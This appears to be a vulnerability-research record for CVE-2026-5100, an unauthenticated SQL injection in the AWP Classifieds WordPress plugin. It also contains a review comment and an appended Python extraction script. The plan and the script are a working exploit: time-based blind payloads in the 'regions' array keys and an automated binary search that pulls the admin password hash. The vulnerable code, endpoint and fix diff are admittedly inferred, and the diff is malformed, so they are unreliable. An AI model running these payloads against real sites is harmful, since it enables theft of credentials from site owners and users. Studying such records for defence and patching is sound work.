[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAH5O29ot4meocLGd6t4hOD6ZjGnYP3nj_um89EdSnWE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5100","awp-classifieds-unauthenticated-sql-injection-via-regions","AWP Classifieds \u003C= 4.4.5 - Unauthenticated SQL Injection via 'regions'","The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","another-wordpress-classifieds-plugin",null,"\u003C=4.4.5","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-04 14:11:27","2026-05-11 20:37:02",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7908d167-f831-4ed0-b754-2b390b5c3b2c?source=api-prod",[],"researched",false,3,"This research plan focuses on exploiting a SQL Injection vulnerability in AWP Classifieds (\u003C= 4.4.5) via the keys of the `regions` parameter array.\n\n### 1. Vulnerability Summary\nThe AWP Classifieds plugin fails to properly sanitize or prepare SQL queries when processing the `regions` parameter in certain AJAX actions. Specifically, the plugin iterates over the `regions` array and uses the **keys** of this array directly in a SQL statement. Since array keys in PHP are often overlooked during sanitization (which usually focuses on values), an attacker can inject malicious SQL by crafting a request with a payload as the key.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `awpcp-get-regions-options` (inferred as the primary handler for region selection).\n*   **Vulnerable Parameter:** `regions` (array keys).\n*   **Authentication:** Unauthenticated (`wp_ajax_nopriv_awpcp-get-regions-options`).\n*   **Payload Location:** URL-encoded POST body.\n*   **Preconditions:** The \"Regions\" feature must be enabled in AWP Classifieds settings, and at least one region (e.g., a country) should exist in the database to trigger the code path.\n\n### 3. Code Flow (Inferred)\n1.  **Entry:** The request hits `admin-ajax.php` with `action=awpcp-get-regions-options`.\n2.  
**Dispatch:** WordPress executes the hook `wp_ajax_nopriv_awpcp-get-regions-options`, calling the handler (likely in `Regions_AJAX_Handler` or similar).\n3.  **Input Processing:** The handler retrieves `$_POST['regions']`.\n4.  **Vulnerable Sink:** The code iterates through the array:\n    ```php\n    foreach ( $_POST['regions'] as $region_id => $region_data ) {\n        \u002F\u002F The $region_id (the key) is used in a query without $wpdb->prepare()\n        $wpdb->get_results( \"SELECT ... FROM ... WHERE parent_id = $region_id\" );\n    }\n    ```\n5.  **Execution:** The database executes the injected SQL within the `$region_id` context.\n\n### 4. Nonce Acquisition Strategy\nAWP Classifieds typically uses a nonce for its AJAX operations. If the handler enforces a nonce check via `check_ajax_referer()`, it must be extracted from the frontend.\n\n1.  **Identify Page:** The region selector is usually found on the \"Browse Ads\", \"Search Ads\", or \"Place Ad\" pages.\n2.  **Shortcode:** `[awpcpsearchposts]` or `[awpcp_place_ad]`.\n3.  **Creation:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Search Ads\" --post_status=publish --post_content='[awpcpsearchposts]'\n    ```\n4.  **Extraction:**\n    -   Navigate to the newly created page.\n    -   The plugin localizes data in a variable usually named `awpcp_ajax_data` or `awpcp_regions_data`.\n    -   **JavaScript to execute:** `window.awpcp_ajax_data?.nonce` or `window.awpcp_regions_data?.nonce`.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload because the results of the `regions` query might not be directly reflected in a way that allows easy UNION extraction.\n\n*   **Payload Target:** Array key of `regions`.\n*   **Payload Type:** Time-based (SLEEP).\n*   **HTTP Tool:** `http_request`.\n\n**Step-by-Step:**\n\n1.  
**Baseline Request:**\n    Send a legitimate-looking request to establish a baseline response time.\n    ```json\n    {\n        \"action\": \"awpcp-get-regions-options\",\n        \"regions[0]\": \"1\"\n    }\n    ```\n\n2.  **Exploit Request (Sleep 5):**\n    Inject the payload into the key. Note the closing bracket `]` in the parameter name: PHP takes everything between the first `[` and the next `]` as the array key, so the payload must not itself contain square brackets. The `0 AND ...` form is evaluated as part of the WHERE clause of the inferred query, which is why section 6 requires at least one region row to exist.\n    ```json\n    {\n        \"action\": \"awpcp-get-regions-options\",\n        \"regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x)]\": \"1\"\n    }\n    ```\n\n3.  **Data Extraction (Time-based, one character per probe):**\n    To extract the admin user's password hash, make the delay conditional on a character comparison:\n    ```json\n    {\n        \"action\": \"awpcp-get-regions-options\",\n        \"regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x WHERE (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='$')]\": \"1\"\n    }\n    ```\n    This form needs quote characters around `$`. Comparing `ORD(SUBSTRING(user_pass,1,1))` against an integer instead is quote-free, which sidesteps any slashing of the request and allows a binary search over the character value (about 7 requests per character instead of one per candidate).\n\n### 6. Test Data Setup\n1.  **Install\u002FActivate:** Ensure AWP Classifieds is active.\n2.  **Enable Regions:** \n    ```bash\n    wp option update awpcp-enable-regions-module 1\n    ```\n3.  **Add a Region:** (Crucial for ensuring the query actually executes)\n    Use the plugin's admin UI or WP-CLI to ensure at least one country is defined in the `awpcp_regions` table.\n4.  **Create Search Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit Test\" --post_status=publish --post_content='[awpcpsearchposts]'\n    ```\n\n### 7. Expected Results\n*   **Vulnerable Response:** The HTTP request will hang for approximately 5 seconds before returning a response (likely a JSON object with `success: true` or a `0`).\n*   **Non-Vulnerable Response:** The request returns immediately with a `0` or an error message if the key is rejected.\n\n### 8. Verification Steps\nAfter the HTTP exploit, confirm that the injected SQL actually reached the database:\n1.  **Check SQL execution:** `SAVEQUERIES` keeps executed queries in `$wpdb->queries` in memory, not in a log file. A syntactically broken probe produces a `WordPress database error` line that `$wpdb` hands to `error_log()`, which lands in `wp-content\u002Fdebug.log` when `WP_DEBUG` and `WP_DEBUG_LOG` are enabled. To see the exact statement with the injected key, enable the MySQL general query log (`SET GLOBAL general_log = 'ON'`) on the test instance.\n2.  
**Observe Database behavior:** Use `wp db query \"SHOW PROCESSLIST\"` while the payload request is still in flight to see the connection sitting in the `User sleep` state.\n3.  **Confirm Extracted Data:** Compare the characters recovered through the blind extraction with the real hash, read directly with WP-CLI (the PoC should only read data, never modify it):\n    ```bash\n    wp user get 1 --fields=user_pass\n    ```\n\n### 9. Alternative Approaches\n*   **Error-Based:** If `WP_DEBUG` is enabled, try `regions[0 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)]`. AWP Classifieds occasionally outputs database errors in its AJAX responses.\n*   **Different Action:** If `awpcp-get-regions-options` is patched or requires high privileges, check `awpcp-update-region-selection` or `awpcp_get_locations_options`.\n*   **Key Termination:** The inferred sink compares `parent_id` to the key without quotes, so a quote-terminated payload such as `regions[0' AND SLEEP(5) AND '1'='1]` is only needed if the real query turns out to quote the value; against a numeric sink it just produces a syntax error. Since the payload lives in a key rather than a value, WordPress's GPC (Global, Post, Cookie) slashing may interfere with quoted strings; prefer quote-free constructs (integer comparisons via `ORD()`, hex literals such as `0x7e` for strings) so the payload works either way.","The AWP Classifieds plugin for WordPress is vulnerable to unauthenticated SQL Injection due to the improper use of array keys from the 'regions' parameter in database queries. 
By crafting specific keys in a POST request to the 'awpcp-get-regions-options' AJAX action, an attacker can execute arbitrary SQL commands to extract data from the database.","\u002F\u002F Inferred code from Regions AJAX Handler\nforeach ( $_POST['regions'] as $region_id => $region_data ) {\n    \u002F\u002F The $region_id (the key) is used in a query without $wpdb->prepare() or proper sanitization\n    $wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = $region_id\" );\n}","--- a\u002Fincludes\u002Fhandlers\u002Fclass-regions-ajax-handler.php\n+++ b\u002Fincludes\u002Fhandlers\u002Fclass-regions-ajax-handler.php\n@@ -10,7 +10,7 @@\n-    foreach ( $_POST['regions'] as $region_id => $region_data ) {\n-        $wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = $region_id\" );\n+    foreach ( $_POST['regions'] as $region_id => $region_data ) {\n+        $wpdb->get_results( $wpdb->prepare( \"SELECT * FROM {$wpdb->prefix}awpcp_regions WHERE parent_id = %d\", $region_id ) );\n     }","To exploit this vulnerability, an attacker targets the unauthenticated AJAX endpoint 'awpcp-get-regions-options'. Because the plugin iterates through the 'regions' POST parameter and treats the keys as trusted integer identifiers, a payload can be injected into the key itself. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with action=awpcp-get-regions-options and a payload like regions[0 AND (SELECT 1 FROM (SELECT SLEEP(5))x)]=1. If the server response is delayed by 5 seconds, the SQL injection is confirmed. 
This can be used for time-based blind data extraction of user credentials and other sensitive database contents.","gemini-3-flash-preview","2026-05-04 16:49:21","2026-05-04 16:49:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanother-wordpress-classifieds-plugin\u002Ftags"]
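Review bot: the `@@ -10,7 +10,7 @@` header in `research_fix_diff` promises seven lines on each side, but the hunk shows three (two `-`, two `+`, one context line), so the patch will not apply as written; the path `includes/handlers/class-regions-ajax-handler.php` is inferred rather than taken from the plugin's Trac, so the hunk should be re-cut against the real file. On the fix itself, `$wpdb->prepare( "... WHERE parent_id = %d", $region_id )` closes the injection at this sink, but the loop still iterates `$_POST['regions']` with no `is_array()` guard (a scalar `regions` value makes `foreach` emit a warning) and `$region_data` is read but never validated; no nonce or capability check is visible in the hunk, so the unauthenticated reachability described in the plan is unchanged by this diff.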
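The time-based extraction described in sections 5 and 9 of the research plan, as an added example in Python that is not code from the advisory, from Wordfence, or from the AWP Classifieds plugin. It assumes the plan's inferred `awpcp-get-regions-options` action on `/wp-admin/admin-ajax.php` and the inferred `parent_id = $region_id` sink; `probe_condition`, `build_body`, `http_oracle`, `extract` and `simulated_oracle` are hypothetical helper names, and `SAMPLE_HASH` is a constructed value. The example goes beyond the plan in two ways: the probe compares `ORD()` with an integer so it contains no quote characters, and each character is found by binary search rather than by testing one candidate per request.

```python
import re
import time
import urllib.parse
import urllib.request
from typing import Callable

ACTION = "awpcp-get-regions-options"   # AJAX action inferred in the plan (assumption)
DELAY = 3                              # seconds SLEEP() waits when a probe is true


def probe_condition(position: int, threshold: int, column: str = "user_pass",
                    table: str = "wp_users", uid: int = 1) -> str:
    """SQL boolean that is true when ORD(SUBSTRING(column, position, 1)) > threshold.
    Digits and identifiers only: no quote characters, so addslashes() on the
    request cannot break it, and ORD('') = 0 marks the end of the value."""
    return (f"(SELECT ORD(SUBSTRING({column},{position},1)) FROM {table} "
            f"WHERE ID={uid})>{threshold}")


def build_body(condition: str, delay: int = DELAY) -> str:
    """Form-encoded POST body. The payload is the array KEY of regions[], the
    position the inferred handler interpolates into `parent_id = $region_id`.
    PHP takes everything between '[' and the next ']' as the key, so the
    payload itself must contain no square brackets."""
    key = f"regions[0 AND (SELECT 1 FROM (SELECT SLEEP(IF({condition},{delay},0)))x)]"
    return urllib.parse.urlencode({"action": ACTION, key: "1"})


def http_oracle(url: str, delay: int = DELAY) -> Callable[[str], bool]:
    """Oracle against a live test instance: true when the response took >= delay.
    `url` is the site's admin-ajax.php (assumed). Measure a baseline first and
    raise `delay` on a slow host, or timing noise will corrupt the result."""
    def ask(condition: str) -> bool:
        req = urllib.request.Request(
            url, data=build_body(condition, delay).encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        started = time.monotonic()
        with urllib.request.urlopen(req, timeout=delay * 4) as resp:
            resp.read()
        return time.monotonic() - started >= delay
    return ask


def extract(oracle: Callable[[str], bool], max_len: int, **target) -> str:
    """Recover up to max_len characters with a binary search on ORD():
    7 probes per character instead of one probe per candidate character."""
    recovered = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                       # password hashes are 7-bit ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(probe_condition(pos, mid, **target)):   # ORD > mid ?
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                           # SUBSTRING past the end -> ORD('') = 0
            break
        recovered.append(chr(lo))
    return "".join(recovered)


def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Offline stand-in for a vulnerable server (constructed, for exercising the
    logic without a target): answers each probe against a fake hash value."""
    probe = re.compile(r"SUBSTRING\(\w+,(\d+),1\)\) FROM \w+ WHERE ID=\d+\)>(\d+)")

    def ask(condition: str) -> bool:
        m = probe.search(condition)
        pos, threshold = int(m.group(1)), int(m.group(2))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > threshold
    return ask


SAMPLE_HASH = "$P$BxyzABC123"   # constructed sample; not a real user's hash

if __name__ == "__main__":
    print(build_body(probe_condition(1, 64)))          # the request a target would see
    print(extract(simulated_oracle(SAMPLE_HASH), 64))  # recovers SAMPLE_HASH offline
```

Against a real test instance, replace `simulated_oracle(SAMPLE_HASH)` with `http_oracle("http://target/wp-admin/admin-ajax.php")` and compare the result with `wp user get 1 --fields=user_pass`. If the handler enforces a nonce, add the `_ajax_nonce` field from the page source to the dictionary in `build_body`.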